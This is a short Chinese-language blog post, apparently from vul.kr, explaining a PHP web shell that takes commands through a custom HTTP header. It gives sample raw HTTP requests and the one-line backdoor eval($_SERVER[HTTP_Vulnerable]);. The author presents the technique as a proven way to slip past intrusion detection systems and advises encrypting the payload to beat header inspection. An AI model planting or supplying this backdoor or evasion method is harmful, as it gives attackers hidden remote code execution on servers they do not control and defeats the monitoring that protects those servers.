基于Http Header 的PHP C/S Shell

http://www.vul.kr/?p=455  作者：TTFCT

06年时，发现HTTP HEADER可自定义，插入指定代码，06年8月份成功完成PHPCSHELL C/S TOOL,之后一直使用此TOOL 绕过IDS，07年曾遇到使用 WSC POST提交不能成功连接的情况，而使用 PHPCSHELL 成功连上，之后一直使用，隐蔽性很好。

说了那么多，该阐述一下PHPCSHELL原理了：

先让我们来看一段 HTTP HEADER

GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: www.vul.kr
Connection: Keep-Alive
Cookie: www.vul.kr

HTTP HEADER包含Accept，Accept-Language,User-Agent,Host等信息，我两年前曾发表过一篇文章是关于BBSXP，通过修改User-Agent来实现注入，除了修改外，还可以对 HTTP HEADER增加项，如我们增加:
vulnerable:welcome to www.vul.kr

完整的HTTP HEADER如下：

GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: www.vul.kr
Vulnerable:welcome to www.vul.kr
Connection: Keep-Alive
Cookie: websitecookie

在服务端，接收代码如下：
echo ($_SERVER[HTTP_Vulnerable]);
?>

将HTTP封包NC 提交后，成功显示 "welcome to www.vul.kr",这样就取得了HTTP头我们自定义的信息，POST,GET的提交数据可以做成一句话，当然，HTTP HEADER封包提交也可以，而且可以绕过某些IDS，这也是我为什么一直使用PHPCSHELL的原因。

如果服务端变为：

eval($_SERVER[HTTP_Vulnerable]);
?>

是不是就变成了典型的一句话了：）
有些IDS很BT，会检查HTTP HEADER，要绕过，还是有方法的，提示一点：封包加密，服务端解密再执行。

PHPCSHELL图，本来想做成和WSC功能一样的，但是工作量太大，没时间写。

 

PS: HTTP HEADER提交有字符限制，允许字符数长度：8184.

最后欢迎大家前往 http://www.vul.kr